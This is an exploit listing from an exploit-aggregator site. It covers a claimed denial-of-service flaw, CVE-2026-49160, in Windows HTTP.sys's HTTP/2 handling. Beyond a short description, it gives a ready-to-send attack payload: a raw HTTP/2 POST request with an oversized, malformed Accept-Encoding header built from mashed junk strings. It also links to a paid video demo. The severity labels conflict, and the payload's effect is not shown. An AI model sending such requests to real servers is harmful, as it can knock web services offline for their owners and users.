## https://sploitus.com/exploit?id=PACKETSTORM:224227
# Titles: CVE-2026-49160 - HTTP.sys HTTP/2 Denial of Service (DoS) Vulnerability
# Author: nu11secur1ty
# Date: 06/24/2026
# Vendor: Microsoft Corporation
# Software: Windows HTTP.sys (HTTP/2 Protocol Stack)
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-49160
## Description:
A critical Denial of Service (DoS) vulnerability exists in the Windows
HTTP.sys kernel-mode driver, specifically in its handling of HTTP/2
protocol requests. The vulnerability, tracked as CVE-2026-49160, allows an
unauthenticated remote attacker to cause uncontrolled resource consumption
(CWE-400) by sending a specially crafted HTTP/2 request with an oversized
and malformed Accept-Encoding header. This triggers excessive memory
allocation and CPU utilization within HTTP.sys, effectively crashing the
service and rendering all dependent web services (such as IIS) unavailable.
The attack can be executed within seconds and does not require any form of
authentication or user interaction. All supported versions of Windows
Server (2016, 2019, 2022, 2025) and Windows client OS (10, 11) are affected
prior to the June 2026 security update.
STATUS: MEDIUM - HIGH/ Vulnerability
[+]Payload:
``` POST
POST / HTTP/2
Host: target.com
Accept-Encoding:
AAAAAAAAAAAAAAAAAAAAAAAA,BBBBBBcccACCCACACATTATTATAASDFADFAFSDDAHJSKSKKSKKSKJHHSHHHAY&AU&**SISODDJJDJJDJJJDJJSU**S,RRARRARYYYATTATTTTATTATTATSHHSGGUGFURYTIUHSLKJLKJMNLSJLJLJSLJJLJLKJHJVHGF,TTYCTCTTTCGFDSGAHDTUYGKJHJLKJHGFUTYREYUTIYOUPIOOLPLMKNLIJOPKOLPKOPJLKOP,OOOAOAOOOAOOAOOOAOOOAOOOAOO,****************************stupiD,*,,
```
[+]Demo:
Video Demonstration
[url](https://www.patreon.com/nu11secur1ty/posts/cve-2026-49160-161926764)
Time spent:
00:01:20